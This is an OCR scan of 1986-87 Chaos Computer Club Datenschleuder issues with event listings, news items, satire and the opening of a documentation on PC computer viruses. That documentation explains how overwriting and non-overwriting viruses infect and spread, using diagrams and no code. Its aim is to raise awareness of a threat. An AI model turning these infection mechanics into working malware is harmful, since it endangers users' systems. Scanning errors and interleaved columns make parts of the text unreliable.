C. t.. I.N.C.H. Box (5,00 DM pro Monat ohne zusätzliche Zeltgebühren
2,00 DM pro Monat für Schüler u.ä.)
Älie abonnementpreise beziehen sich auf ca. 1 Jahr, d.h. 8 Ausgaben,
alle Mitgliedsbeiträge gelten ebenfalls für 1 Jahr.
Mitglieder erhalten die Datenschleuder als Abonnement gratis.
Spenden werden jederzeit dankend entgegengenommen!!!
Adressfeld
Name :_
Vorname :_
Hilfszeile :_
Straße :_
Ort :_
Elektronische Adresse:_;_
Datum: _ Hier Unterschrift:
Ohne adress-
aufkleber
mindestens
1,00 DM iS
Trinkgeld J
f
e
«
a
datenschleuder Nr, 17 * Dezenber 1986 * Postvertriebsstück C99Z7F * Geb, bei.
am 28 . und
29. Dezember
Chaos
Connunication
Congress JlfSß
Eidelstedier Bürgernaus
ElbGAUstraße 12
2000 Hamburg 54
Wenn unzustellbar
Anschriftenausschnitt bitte
mit neuer Adresse zurück
Congressbeglnn: Gonnlag, den 28.Dezember 1986■, 09.00 Uhr
DA^ Trellen für Dalenreisendel Telelon, OATEX, BTX, Telex,
Online - Mallbox. DalenlunK, Videos, Klönschnack, und..und...
Utißere Themen dieses Jahr unter anderem; Computervlren,
M.ohilore abhören, Dalensohuli, Oatenirusl, Datenlust, Com-
puler im Bundestag, Quo vadls Müllbox u.v.v.v.v.a —
Und wie Immer dabei: Chaos-Cale, Chaos-Archiv, HacR-
cenler und natürlich der UadlUonelle Inlernatlonale Früh -
schoppen mit lönl Hackern aus sechs Ländern.
Eintrittspreise: Mitglieder 15.-, private Teilnehmer 20.-,
Presse 50.- und gewerbliche Teilnehmer 150.-
1/oranmaldung durch Überweisung aul Konto 59 90 90 -201
beim PostQirosAml Hamburg.
Chaos Computer Club e.V.
Schwenckestraße 85
2000Hamburg20 ,
Telelon 040 / 490 37 57 BTX: 655322 I
Wtllert I n fo rm sll 0 n t n Isutond In der CLINCH' M&llbox Hamburg
040 / $92 05 i; und Dalat-P 4 4 4 0 00 9 0 3 H
lit .,,,0 ’
ChaosC5>"
Datenschleuder 16
DM 2,50
Postvertriebsstück
C9927f
®ie ^aten^c^leubci*
Das wissenschaftliche Fachblatf für Dalenreisendc lÖ/
Ein Organ des Chaos Computer Club '(
Die Datenschleuder Nr. 13
Februar 1987
The Ultimate Message Error
... und weitere Neuigkeiten
aus der Magnetic Media Metropolis
A count: Ergebnisse des CCC’86: Dokumentation:
Volkszählung NETWEAVING & Real Hacking Computer Viren
Hackcr-Mect in gs
Wichtige Termine 1987
04.03.-ll.03. CEBIT - Hannover
Hackertreff Dienstag 16 Uhr am grösstem Poslstand,
sonst siehe Btx Programm.
18.04.-19.04. CCC - Hamburg (Eidelstcdter Bürgerhaus)
II. PC Virenfomm. Aufarbeitung der Erkenntnisse,
Diskussionen und Workshops (Anmeldcn!).
18.04. CCC - Hamburg (Eidelstcdter Bürgerhaus)
Ordentliche Mitgliederversammlung des CCC c.V.
11.06.-14.06. C’87-Köln
Hackerireff täglich beim WDR Compuicrclub, sowie
Dienstag 16 Uhr am Poststand.
28.08.-06.09 IFA - Berlin
Hackertreff Dienstag 16 Uhr am Poststand, sonst
siehe Btx-^ogramm.
12.09.-13.09. CCC - Hamburg (Eidelstedier Bürgerhaus)
Wochenend-Workshop des CCC, Thema noch offen.
19.10.-23.10. SYSTEMS - München
Hackertreff Dienstag am grösstem Poststand, sonst
siche Blx-Programm der BHP.
28.12.-29.12. CHAOS COMMUNICATIONCONGRESS 1987 - Hamburg
Die europäische Hackerparty im Eidelstcdter
Bürgerhaus.
Weitere Hinweise in den Btt-Programmen:
CCC bundesweit *655321#
CAC Regionalbereich 17*920163#
BHP Regionalbereich 32 *92049204#
LS23 • hacker.txt
Zukunftswerkstatten 1987
im Rahmen des Programms 'Mensch und Technik •
sozialveträgliche Technikgestaliung’ des Landes Nordrhein-Westfalen.
Anmeldung bei: Zukunftswerkstälten, Nesenhaus 17,4030 Raüngen 6
20.- DM als Scheck oder bar beifügen.
27.02.-01.03.
DIE VERKABELTE FAMILIE - CHANCEN, PERSPEKTIVEN
UND GEFAHREN
in Kerken
09.03. - 11.03.
ZWISCHEN VIDEO UND COMPUTERNETZEN -
POLITISCHES LERNEN MIT NEUER TECHNIK
in Soest
20.03
FORUM ZU MENSCHENGEMÄßER INFORMATIONS- UND
KOMMUNIKATIONSTECHNIK in Köln
23.03. - 27.03.
MEDIA-PARK KÖLN - STADTTEIL FÜR MODERNE TECHNOLOGIE,
LEBENS-, LERN- UND ARBEITSQUALITÄT in Köln
30.04. - 03.05.
ZUKUNFT DES LEHRENS UND LERNENS IN EINER VON TECHNIK
GEPRÄGTEN WELT in Leichlingen
15.05. - 17.05.
NEUE MEDIEN UND BORGERMITWIRKUNG M KOMMUNALEN BEREICH
in Marl
29.05.-31.05.
WELCHE VORTEILE BRINGT DIE BILDSCHIRMARBEIT DEN FRAUEN?
in Bielefeld
(NUR für Frauen - für Kinderbetreuung ist gesorgt)
19.06. - 21.06.
DER HARTE UND DER SANFTE WEG?
Wege zu einer sozial verträglichen Technik
in Berg. Gladbach
DS Saite Zwai
0 afcndd)k«i>cr
ISTHack
Schon während der Aufbauphase des CCC‘86 glück¬
te der erste Hack: Bei Forschungsarbeiten in einem
heimischen Großrechner Marke VAX wurde ein
Kieinverzeichnis von Computerinstallationen in
Moskau, zuzüglich Seriennummern, gefunden. Unter
anderem steht dort "1 CBM 8032 und I CBM 8250”
sowie ”1 Tüte mit Bauteilen”,
wau
Hacker -
Erinnerung und
Wainung
(Gruppenleiter,
CERN-DD/CS,
Sektion EN)
von Giorgio Heimann
”Wir leiden noch immer täglich unter Attacken von
Hackern. Zur Zeit können wir an einigen VAXen der
CERN ungefähr 20 "Einbruchsversuche” täglich
beobachten.
Obwohl wir uns mit Hilfe der CERN-Rechtsabtei-
lung darauf vorbereitet haben, die Schweizer PTT
einzuschallen, um herauszufinden, welche Aktionen
möglicherweise gegen diese Leute unternommen
werden können, bestehen wir jedoch nach wie vor auf
dem Prinzip, daß jedes System sich selberzu schützen
hat. Dies ist die einzig sinnvolle Lösung, da es einen
sehr viel differenzierteren .Schutz ergibt: außerdem
verlagert diese Strategie die Verantwortung zum
Schutz der Betriebsmittel dahin, wo sic hingehört,
nämlich zum Eigentümer der Betriebsmittel.
Neben "externem” Hacken haben wir vor einigen
Wochen einen Fall einer internen Attacke gehabt.
Der Ausgangspunkt des Vorfalls wurde zurückver-
folgt und die verantwortliche Person konnte identifi¬
ziert werden. Wir beschlossen, diesen Vorfall zu ver¬
gessen, da in diesem speziellen Fall keinerlei böser
Wille im Spiel gewesen war. Wir mußten aber eine
Menge (rarer) Arbeitskraft für die Suche verplem¬
pern, so daß unsere Aufmerksamkeit von unseren ei¬
gentlichen Aktivitäten und der Überwachung von
ernsteren und böswilligeren Attacken abgezogen
wurde.
Deshalb seien alle CERN-Benutzer gewarnt, daß wir
in Zukunft möglicherweise mit ernsthafter Verfol¬
gung gegen Leute vergehen, die für "Hack-Attac-
ken” verantwortlich sind.”
Aus: '"Mini & Micro Computer Newsletter'', Dec. '85: Überset¬
zung: T. Twiddlebit
Dalcx-P: Auslösung
Entwicklungsfehler
Wenige haben es noch nie erlebt: Auf einmal bricht die
Verbindung zusammen, ja, cs scheint sogar so häufig
vorzukommen, daß schon “Ansagetexte" wie
PATEX-D: Auslösung - Veranlassung durch Durchfall
PATEX-POO; Einlösung - Veranlassung durch Zufall
im GeoNet zu finden sind.
Warum das passiert, liegt häufig daran, daß durch Über-
tragungsstömngen die zwei an einer Pakctübcnnitllung
beteiligten Reclincr total aus der Synchronisation laufen,
d.h. jede Seite "vermutet“ etwas falsches über den Zu¬
stand der anderen Seite.
Unglücklicherweise ist nun das X.25 Protokoll, der in¬
ternationale Standard für viele Strecken im Pakclnetz, so
konstmiert. daß es nicht selbstsynchronisiercnd ist. Eine
Paketübermittlung mit X.25 ist in einem labilen Gleich¬
gewicht; zu Beginn der Übertragung werden spezielle
Initialisierungspakete ausgetauscht, die nur einen ein¬
deutigen Zustand hersteUen, wenn die Sendc/Emp-
fangspuffer auf beiden Seiten geleert sind.
Resultat: Nach dem Herstellen einer virtuellen Verbin¬
dung "vergißt" das Netz manchmal, welche Pakete schon
“abgeliefert“ sind. Resultat:
DATEX-P: Auslösung - Ablauffehler
Die Gründe dafür sind historischer Natur:
X.25 wurde aus dem IBM SDLC (Synchronous Data
Link Control) heraus cntwickelt/übemommen. Daboi
haben sich in den X.25 Standard Stmkturen aus SDLC
Tagen eingeschlichen, dieinzwischen vollkommen sinn¬
los sind; andere, für eine Resynchronisierbarkeit not¬
wendige Informationen, werden jedoch nicht übermit¬
telt. Dies ist bei der Weiterentwicklung und Benutzung
von X.25 erkannt worden und führte zur Erfindung von
immer neuen, speziellen “Steucrpakclcn“. Kurz; Ein
typisches Beispiel für einen im GRUNDE vermurksten
Kommittee-Entwurf, der auch durch Einziehen immer
neuer Stützbalken nicht richtiger wird.
Folge: Ein Alptraum an Komplexität und Sonderfall-
bchandlung für jeden Systemprogrammicrer, der ein
X.25 Protokoll implementieren muß. Zustzlich ist der
Wortlaut in den CCITT Dokumenten so vieldeutig, daß
Implementationen, die sich an den Text gehalten haben,
inkompatibel sind.
Für eine ins einzelne gehende Kritik und - vor aUem -
einen konslraklivcn Vorschlag für ein sclbstsynchroni-
sicrendes Protokoll (in Pscudo-Pascal), das sehr einfach
zu implementieren ist: “Serial Link Proiocol Design; A
Critique of ihc X.25 Standard, Level 2" by John G,
FIcteher, Lawrence Livermore Lab. erschienen in einem
Konfcrcnzbcricht der SIGCOMM (ACM) 1984 “Com¬
munications Architectures & Protocols“
KS
SrtfcnSrfjlcubce
DS Saite Drai
Strtililongefilhr
k ' aus dem Telefon
Wir berichteten in der letzten Ausgabe (ds 17) über
ein neues Leistungsmerkmal der Gebührenzähler in
Posttelefonen. Inzwischen beschäftigt sich der Bun¬
desbeauftragte fUrden Datenschutz (BfD) mit diesem
Phänomen.
Festgestellt wurde, daß alle mechanischen GebUh-
renzähler (herkömmlicher Bauart, ca. 1,3 Mio.) einen
Fehler im "Begrenzverstärker” aufweisen und da¬
durch (in Toleranzgrenzen) im Langwellenbereich
das Gespräch wie ein Sender ausstrahlen. Dieses Si¬
gnal wurde mit guten Empfängern beim FTZ noch in
40 cm Entfernung gemessen. Inwieweit metallische
Leitungsführungen (z. B. Heizungen) dieses Sendesi¬
gnal weiterleiten und dadurch die Reichweite ver¬
stärken, wurde noch nicht berücksichtigt.
Eine Austauschaktion der betreffenden Gebühren¬
zähler erscheint dem BfD im Verhältnis zum Auf¬
wand nicht angemessen. Vielmehr sollten alle betref¬
fenden Fernsprechteilnehmer über diesen Umstand
informiert werden. Desweiteren ist es zu überdenken,
die Störstrahlenverordnungen für zukünftige Entwic¬
klungen anzupassen. Bisher entsprechen die "strah¬
lenden" Telefone diesen Vorschriften.
Strahlende Fernsprechteilnehmer erhielten bisher
kostenfrei Ersatzgeräte. Derzeit läuft gerade eine
Bundestagsanfrage derGRÜNEN zu diesem Thema,
über deren Ausgang wir berichten werden.
LS23
STRAHL18.DOC 19870131 2053
DPA hackt
förderte den Namen des himmelschreibenden Piloten
zutage. Dieser, gerade wieder festen Boden unter den
Füßen, zeigte sich eher belustigt über die Interpreta¬
tion des Hauses dpa. Er habe die Telefonnummer
611061 an den Himmel geschrieben, und das wäre die
Rufnummer einer Hamburger Taxizentrale. Da hätte
dpa wohl einen etwas falschen Standpunkt gehabt
und die Zahlen verdreht.
Wer da nun was hinter die Rufnummer I90M9 ge¬
klemmt hat, ist bis zur Stunde unbekannt. Wie aus gut
unterrichteten Krei.sen verlautet, wurden erste Re¬
cherchen angeleiert. Möglicherweise handelt es sich
aber auch nur um ein einfaches Telefax-Gerät...
jwi
DPAHAK18.DOC 1987 0131 2000
.Stcllcnan/cigc
Wir stellen 1:
- Buchhalterin)
- Datatypist(in)
- Programmierer(in) für C, Pascal, Ba¬
sic, 68000 Assembler
- Chefsekretär(in)
- Postbearbeiter(in)
- Archivar(in)
Aber nicht etwa sechs Einzelpersonen, sondern
EINE fähige Kraft, die das alles zusammen kann,
ohne nach 46.983 Sekunden (bisherige Bestleistung)
einen Zusammenbruch zu erleiden. Wir sind ein auf¬
strebender Verein von Compuierchaoten auf der Su¬
che nach den Problemen, für die wir jetzt schon Lö¬
sungen haben.
Wir bieten:
Tief versunken in der Arbeit werkelte am Dienstag,
den 9. Dezember 86 die G.ID.-Redaktion (Genethi¬
sche InformationsDienste; die biologische Daten¬
schleuder) an ihrer nächsten Ausgabe. Plötzlich
schrillte das Telefon. Eine Mitarbeiterin der Deut¬
schen Presse- Agentur hatte am Himmel ein Flugzeug
entdeckt, welches eine mysteriöse Zahlenkombina¬
tion in die Wolken über Hamburg schrieb.
Durch kreatives Betrachten konjite die Zahlenreihe
190 119 entziffert werden, wobei sich sofort der
Schluß aufdrängte, es könne sich um eine Telefon¬
nummer handeln. Das Telefon wurde angeworfen -
und tatsächlich.
DOCH AUF DER ANDEREN SEITE WAR KEI¬
NE MENSCHLICHE STIMME • sondern ein
merkwürdiger Piepston. Nun sind auch dpa-Journa-
listen technisch versiert und schlußfolgerten, daß es
sich um einen ”Computerton” handeln muß. Sofort
wurde das hauscigcne Texi aktiviert und munter
drauflos gehackt. Allerdings ohne Erfolg. Hilfe wur¬
de nun von der angeblich technisch versierten G.ID-
Rcdaktlon erbeten. Doch auch diese scheiterte am
beschränkten know how.
Um das Gesicht zu wahren, beschlaß man, das Pro¬
blemfeld zu verlagern und ”nichttechnische Alterna¬
tiven” einzuieiten. Ein Anruf beim Flughafen-Tower
- angenehme Arbeitsatmosphäre in einem typischen
Feuchlbiotop
- rasche Aufstiegsmöglichkeiten (ein Teil unseres
Archivs lagert auf dem Dachboden) !L- abwechs¬
lungsreiche Tätigkeit (jeden Tag ein anderes Datum)
- interessante Sozialleistungen (was wir uns leisten, ist
wirklich sozial = gemein)
- angemessene Bezahlung (unserem Konto angemes¬
sen)
- eigenverantwortliche Tätigkeit (wir werden Sie
schon zur Verantwortung ziehen)
- gleitende Arbeitszeit (Sie haben da zu sein, wenn wir
Sie brauchen)
- klare Arbeitstrukturen (Sie erhalten maximal sieben
widersprüchliche Auträge)
Wirerwarten:
- keine Widerrede
Bewerbungen bitte bis gestern an die Re(d)akuon;
Lichtbild unnötig, Lebenslauf und Referenzen un¬
wichtig. Wer sich bei uns bewirbt hat eh keine andere
Wahl. Gewerkschaflier erwünscht (sofern Mitglied
der Gewerkschaft der Sklaven des römischen Rei¬
ches),
goblin
DS Saite Via
Das PG-Virenforum
f Chaos
Communication
Congress
Eine Dokumentation in fünf Teilen
von Steffen Weraery
Teil 1 - Virus Grundlagen, ein geschichtlicher Rückblick
Teil 2 - PC-Virus Grundlagen (basierend auf MS-DOS)
Teil 3 - Der Demovirus für MS-DOS
Teil 4 - Juristische Hinweise
Teil 5 - Thesen und Ansichten
"Ein ’Virus’-Programm, ins Betriebssystem
eingepflanzt, gehört zum Gefährlichsten,
was ein DV-System bedroht.” Zu dieser
Aussage kam die in Ingelheim erscheinende
Zeitschrift für Kommunikations- und EDV-
Sicherheit (KES) im,Juli 1985. Vorausge¬
gangen war die erste deutschsprachige Ver¬
öffentlichung über Computerviren in der
Bayrischen Hackerpost (3/85). Seitdem gei¬
stert das Thema durch die Fachpresse und
wird von Insidern hinter vorgehaltener
Hand diskutiert. Alle bisherigen Veröffentli¬
chungen zu diesem Thema beruhen auf For¬
schungsergebnissen, die Fred Cohen 1984 an
der University of Southern California erar¬
beitete.
Neuere Erkenntnisse, gerade im Hinblick
auf die zunehmende Verbreitung programm¬
kompatibler Personalcomputer (PC’s), sind
bis heute nicht bekannt geworden.
Mitte 1986 tauchten die ersten PC-Viren in
Freeware (Programme zum Tauschen) aus
den USA in der BRD auf. In den Folgemo¬
naten gingen in der Redaktion der DATEN¬
SCHLEUDER erstmals in Deutschland
programmierte Viren für Heim- und Perso¬
nalcomputer (u.a. MS-DOS) ein. Die ersten
Programmierer wandten sich an den Chaos
Computer Club (CCC) - wohin sonst?
Obwohl durch entsprechende Veröffentli¬
chungen in der Fachpresse eine Sensibilität
für das Gefahrenpotential der Computervi¬
ren bei Herstellern von Betriebssystemen,
den Systemhäusern und Softwareanbietern
vermutet werden sollte, bewiesen unsere Re¬
cherchen das Gegenteil. Die Systemhäuser
haben oder wollen die Problematik nicht er¬
kennen. Ein Bewußtsein, das zur Informa¬
tion über Risiken verpflichtet, ist dort bisher
nicht vorhanden. Vielmehr ist zu erwarten,
daß Industrie und Handel das Gefahrenpo¬
tential durch Unterlassung von Information
fahrlässig fördern.
Die meisten Anwender von Personal-Com¬
putern in Industrie, Handel und Handwerk
sowie alle privaten Nutzer sind somit dieser
Entwicklung schutzlos ausgeliefert.
Der CCC sah sich deshalb veranlaßt, den
Chaos Communication Congress ’86
(CCC’86) unter den Schwerpunkt”Compu-
ter-Viren” zu stellen. Nur eine Öffentliche
Diskussion kann eine Sensibilität für diese
Entwicklungen fördern und Erkenntnisse
über Folgen, Auswirkungen und Schutzmö¬
glichkeiten sammeln und vermitteln.
Ende Dezember wurde in Hamburg das
weltweit erste Öffentliche Diskussionsforum
über Computerviren für Home- und Perso¬
nalcomputer abgehalten. Rund 200 Hacker,
Studenten und Computerfreaks, davon ca.
20 Programmierer mit Viren-Erfahrungen
nahmen an diesem Forum teil.
Diese Dokumentation faßt erstmalig Er¬
kenntnisse und Diskussionen des VirenFo-
rums zusammen.
DS Saite Föml
Teill
Virus-Grundlagen
Gesrhichflirher Riirkhlick
Allgemeines
Der Begriff "ComputerViren” wurde 1983 von Len
Adleman an der Universityof Southern California im
Zusammenhang mit Cohens Experimenten geprägt.
Als Computer-Virus wird ein Programm bezeichnet,
das die Eigenschaft hat, andere Programme zu infi¬
zieren. Jedesmal, wenn ein Virus aktiviert wird (z.B.
durch Starten eines verseuchten Programms), kopiert
es sich selbst in ein anderes, noch nicht infiziertes
Programm. Jedes infizierte Programm ist ein Viren¬
träger und steckt bei Aktivierung wiederum weitere,
unverseuchte Programme an. Die Infektion breitet
sich, biologischen Viren ähnlich, lawinenartig in
einem DV-System oder Netzwerk aus. Das Virus brei¬
tet sich auf den legalen Pfaden aus, es benutzt die Au-
torisierung der infizierten Programme. Anwender mit
hohen Zugriffsrechten auf Netzwerken verschleppen
das Virus in alle Teile einer DV-Anlage. Dies sind die
ersten entscheidenden Eigenschaften von Compu-
terViren.
Es ist sicher problematisch, für technische Abläufe
biologische Begriffe zu verwenden. Die Bezeichnung
”Virus” ist ein Sammelbegriff für eine besondere
Form organischer Strukturen, die sich nur über eine
spezifische Wirtszelle vermehren können. Hierin liegt
eine gewisse Ähnlichkeit, denn "ComputerViren”
benötigen ebenfalls ein "Wirtsprogramm”, das das
Virus aufnehmen und verbreiten kann. Obwohl der
Vergleich nicht stimmig ist, haben US-Wissenschaft-
ler Begriffe wie ”Viren”, "Seuchen” und "Infektio¬
nen", wegen der Ähnlichkeiten mit biologischen
Abläufen, schon vor Jahren geprägt.
Computer-Seuchen
Über sogenannte Seuchen, die mit Hilfe von Wirt-
sProgrammen in DV- Systeme "verschleppt” werden,
gibt es Untersuchungen, die zum Teil schon vor 10
Jahren veröffentlicht wurden. Bereits in den 70er Jah¬
ren berichteten Anderson und Linde über "Trojani¬
sche Pferde", Programme, die gezielt fremde Pro¬
gramme angreifen und dort Funktionsabläufe verän¬
dern. Im Gegensatz zu CompuierViren verbreiten
sich "Trojanische Pferde" nicht ungezielt, sondern
greifen gezielt ein (REM: if you find Wordstar then
ersetze funktion sichern gegen löschen).
Hinterhältige Bedrohung
Die eigentliche Gefahr der Virenprogramme ist, ne¬
ben der unkontrollierten Verbreitung, die Einschleu¬
sung von manipulierenden Programmabläufen. Das
Virus kann als Programm jedwede vostellbare und
programmierbare Manipulationsaufgabe mit sich
führen und verbreiten. Dadurch wird die Gebrauchs¬
fähigkeit der Computer radikal in Frage gestellt. Das
Virus kann ungehindert alle Abläufe verändern, ver¬
fälschen, ersetzen oder völlig andere Aufgaben aus¬
führen. Eine perfide Form von Compulersabotage,
gegen die besonders gängige Personalcomputer un¬
geschütztsind.
Spärliche Informationen
Bisher lagen nur wenig differenzierte Informationen
über erfolgreiche Experimente mit ComputerViren
vor. Fred Cohens Versuche auf mittleren und grossen
Rechnern wurden wegen deren Gefährlichkeit von
den Systemverantwortlichen abgebrochen. Versiche¬
rungen und Banken, sowie das Militär halten sich mit
ihren Erkenntnissen bedeckt. Aus Industriekreisen
war nur gerüchteweise von erkannten Viren die Rede
(wer hätte auch den Mut zu sagen: Wir sind ver¬
seucht). Professor Dr. Brunnstein (UNI HH) berich¬
tete auf der Pressekonferenz des CCC’86 von einem
Virus auf dem Universitätsrechner, der von einem
kommerziell genutzten System aus eingegeben wur¬
de. Auch die Technische Universiät Berlin vermutete
einen Virenbefall und mußte Anfang *86 einen 14tä-
gigen Ausfall ihrer IBM/4381 (Großrechner mit
komfortablem Betriebssystem) hinnehmen, bis der
Betrieb mit einer "sauberen" Systemversion wieder
aufgenommen werden konnte.
Kein Gefahrenbewußtsein
Rüdiger Dierslein (DFVLR) beschrieb bereits auTder
neunten Datenschutzfachtagung am 14. II. 85 in
Köln wesentliche Aspekte des Virus-Phänomens. "Es
ist längst bekannt, daß man Programme schreiben
kann, die sich selbst in einem Computersystem re¬
produzieren. Solche Programme können mit bösarti¬
gen Eigenschaften versehen sein. Die Reproduktion
der Programme samt ihrer unerwünschten Neben¬
wirkungen kann auf eine Art gestaltet werden, daß
andere, beliebige Programme zum Träger werden. Es
sind "unauffindbare” Viren möglich, Unterpro¬
gramme also, die sich einer systematischen Suche
durch Eigenmodifikation (sich selbst verändernder
Viruscode) entziehen".
Dierstein mußte sich in der folgenden Diskussion mit
"Abwehrreaktionen" auseinandersetzen. Besonders
markant fiel die Stellungnahme des IBM-Daten-
schutzbeauftragten G. Müller aus, der das Virusphä¬
nomen als ein theoretisches, in den Softwarelabors
längst gelöstes Problem bezeichnete.
So wundert es nicht, daß trotz ausführlicher Informa¬
tionen ein Gefahrenbewußtsein gegenüber den Com¬
puterViren nicht ausgebildet ist. Gegenmaßnahmen
werden vom DATENSCHUTZBERATER(5/86) als
"eher dürftig und konventionell" bezeichnet. Refe¬
renten von Sicherheitsseminaren meldeten "eine un¬
glaubliche Ignoranz" verantwortlicher Systcmbeirei-
ber gegenüber der Bedrohung durch ComputerViren.
Für den Bereich der Personalcomputer bleibt fcstzu-
stellen, daß bisher nur der DATENSCHUTZBERA¬
TER (10/86) sich dieses Themas angenommen hat.
Neue Erkenntnisse waren dort aber ebensowenig zu
finden wie in der jüngsten Veröffentlichung der
Computerpersönlich (24/86).
iSinIcnSdjIcnbcT
Fahrlässige Informationspolitik
Es bleibt festzustellen, daß ein Bewußtsein über die
Bedrohung durch ComputerViren bisher nicht aus¬
gebildet ist. Hinzu kommt, daß die Bereiche Heim-
und Personalcomputer unbeleuchtet blieben. Die In¬
dustrie hat bis dato jegliche öffentliche Auseinander¬
setzung mit diesem Thema vermieden. Programmie¬
rer von PC-Viren, die sich zwecks Infomationsau¬
stausch mit verschiedenen Firmen in Verbindung
setzten, ernteten eher Unverständnis, ("Für welchen
Preis wollen Sie Ihr Virus auf den Markt bringen?")
aber keine Basis für qualifizierte Gespräche. Es
drängt sich der Verdacht auf, daß bisher keine Ab¬
wehrstrategien entwickelt wurden und deshalb dieses
Thema absichtlich totgeschwiegen wird. Totschwei¬
gen ist bekanntlich kein Abwehrrnimel, eher wird der
unkontrollierten Verbreitung dadurch Vorschub ge¬
leistet.
Soweit der geschichtliche Rückblick.
Teil 2
Das PC-Virus
Grundlagen, basierend auf Erfahrungen
mit dem Betriebssystem MS-DOS
Im folgenden sollen, zur Vermittlung der Grundla¬
gen, einige VirusFormen erläutert und auf deren Ver¬
breitungsverhalten eingegangen werden. Darüber hi¬
naus werden Hinweise über mögliche Manipulation¬
saufgaben und den Schutz gegen ComputerViren ge¬
geben. Die Informationen beziehen sich auf Erfah¬
rungen mit dem Betriebssystem MS-DOS, die auch
für ähnliche Betriebssysteme gelten.
Funktionsweise einiger ComputerVi¬
ren
ComputerViren können sich auf unlerschiedliche
Arten in Programmbeständen verbreiten. Dabei kön¬
nen die betroffenen Programme In ihrer ursprüngli¬
chen Funktion gestört werden. Zur Differenzierung
erläutern wir, auf der Basis der Erkenntnisse, die Ralf
Burger Mitte 1986 dokumentierte, die wesentlichen
Unterschiede zwischen
— überschreibenden
— nichtübcrschreibcnden und
— speicheresidenten
Viren.
Ein ComputerVirus besteht aus mehreren Programm¬
teilen. Um bereits infizierte Programme zu erkennen,
versieht das Virus diese Programme mit einem Er-
kennungsMerkma! (M). Der Programmieil mit der
Verbreitungsaufgabe wird als Viruskern (VIR) be¬
zeichnet. Zusätzlich kann über das Virus eine Mani¬
pulationsaufgabe (MAN) verbreitet werden. Vor der
Ausführung der ursprünglichen Programmaufgabe
muss das betroffene Programm eventuell durch eine
Verschieberoutine (VER) wiederhergestelU werden.
Sntcnädjlciibcr
M = ErkennungsMerkmal
VIR = Verbreitungsaufgabe (Virulenz)
MAN = Manipulationsaufgabe
VER = Verschieberoutine
Funktionsweise überschreibender Vi¬
ren
Überschreibende Viren beeinträchtigen oft die Funk¬
tionsabläufe der infizierten Programme. Das Virus
überschreibt einen Teil des vom betroffenen Pro¬
gramm belegtem Speicherplatzes. Dabei wird das
Programm zer- oder gestört, wobei das Virus nicht
durch Erhöhung des Speicherplatzes auffällt.
Um ein ComputerVirus einzuschleusen, wird ein so¬
genanntes Trägerprogramm mit dem Virus infiziert.
Das Trägerprogramm weist bei der Ausführung kei¬
nen Fehler auf, da das Virus entsprechend sorgfältig
eingepaßt wurde. Wird das Trägerprogramm als nütz¬
liches Hilfsprogramm getarnt, kann die Verbreitung
z.B. durch die Neugier des unbedarften Anwenders
gestartet werden.
! M ! VIR ! MAN ! 1. Programm !
Wird das 1. Programm aktiviert, findet das Virus beim
Suchen im Inhaltsverzeichnis des Datenspeichers
(vorzugsweise Festplatten) ein 2. Programm. Wenn
dieses bereits das ErkennungsMerkmal aufweist,
wird weitergesucht.
! 2. Programm
Der Viruskern kopiert das vollständige Virus in das 2.
Programm hinein und überschreibt dabei den für das
Virus benötigten Speicherplatz am Programmanfang.
Das geänderte Programm wird abgespeichert und die
MANipulationsaufgabe des Virus wird ausgeführt.
Erst danach wird das I. Programmausgeführt.
! M ! VIR ! MAN ! , . . Rest des 2 . Programms !
Beim Starten des 2. Programmes findet zuerst die
Übertragung in das 3. Anwenderprogramm statt. Das
2. Anwenderprogramm arbeitet eventuell fehlerhaft,
da Programmteile durch das Virus überschrieben
wurden.
! M ! VIR ! MAN ! . . . Rest des 3. Programms !
Dieser Verbreitungsvorgang wiederh olt sich bis zur
totalen Durchseuchung des Systems. Bei diesem Vi¬
rus-Typ kann das Virus als das letzte funktionsfähige
Programm übrigbleiben.
Bei geschickter Programmierung des Virus bleiben
auch bei überschreibenden Viren einige Programme
funktionsfähig. In einem relativ großem Buffer (von
Programmen reservierter Speicherplatz) lassen sich
Viren gut verstecken. SideKick läuft in wesentlichen
Funktionen auch mit einem Virus dieser Form. Es
stellt dadurch ein Risiko beim Programmtausch dar,
denn Viren dieser Form können darin unbemerkt
verbreitet werden.
DS Saite Sächs
DS Saite Siim
I
m'
Funktionsweise nicht überschreiben¬
der Viren
Nicht übcrschreibcndc Viren vergrößern den Spei¬
cherplatz des infizierten Programmes. Die betroffe¬
nen Programme bleiben funktionsfähig.
Zum Zweck der Einschleu.sung ist ein Programm be¬
wußt mit einem Virus infiziert worden. Es tritt bei der
Ausführung kein Fehler auf.
\ M ! VIR ! MAN ! VER ! 1. Programm !
Der Viruskern findet beim Suchen ein 1. Programm.
Wenn dieses Programm das ErkennungsMerkmal
aufweisi, wird weitergesucht.
! 2. Programm (Teil 1 und 2) !
Um den Speicherplatz am Programmanfang neu zu
belegen, kopiert das Virus einen Teil des 2. Program¬
mes. welcher der Länge des Virus entspricht, an das
Ende des Programmes.
! 1, Teil ! 2. Prgrm T. 2 !
! 1. Teil ! 2. Prgrm T. 2 ! 1, Teil
Der Anfang des 2. Programmes ist nun zweimal vor¬
handen. Jetzt legt das Virus hinter dem ans Ende ko¬
pierten Programmanfang die Verschieberoutine
(VER) ab.
! 1, Teil ! 2. Prgrm T. 2 ! 1, Teil ! VER !
Das Virus kopiert sich nun selbst an den Beginn der
Datei und überschreibt dabei den l. Teil des Pro-
grarnmes. Es speichert die geänderte Version ab. An¬
schließend wird die MANipulationsaufgabe, und da- *
nach das 1. Programm ausgeführt.
!M ! VIR ! MAN ! 2, Prgrm T. 2 ! l. Teil ! VER !
Beim Starten des 2. Anwenderprogrammes findet zu¬
nächst die Übertragung des Virus in das 3. Anwen¬
derprogramm statt. Danach wird die MANipulalion-
saufgabe ausgeführt. Nun folgt ein Sprung zur Ver-
schieberouiine. Diese Routine kopiert im Arbeits¬
speicher den 1. Teil des Programmes wieder an den
Dateianfang. Dadurch wird das Virus im Arbeitsspei¬
cher Überschrieben.
! I.Teil ! 2. Prgrm T. 2 ! I.Teil i VER !
Im Arbeitsspeicher steht jetzt wieder die Orginalver-
sion des 2. Programmes. Die Verschieberoutine
beendet ihre Aufgabe mit einem Sprung zur Starta¬
dresse am Dateianfang. Das 2. Programm wird nun
fehlerfrei abgearbeitet; das 3. Programm ist infiziert
worden.
Vor dem Starten des 2. Programmes:
l 3. Programm
Nach dem Starten des 2. Programmes:
! M ! VIR ' MAN ! 3. Prgrm T, 2 ! 1. Teil ! VER !
Besondere Formen von ComputerVi-
ren
Funktionsweise speicherresidenter Viren.
Speicheresidente Viren sind eine Sonderform von
ComputerViren. Der Unterschied liegt in der Form,
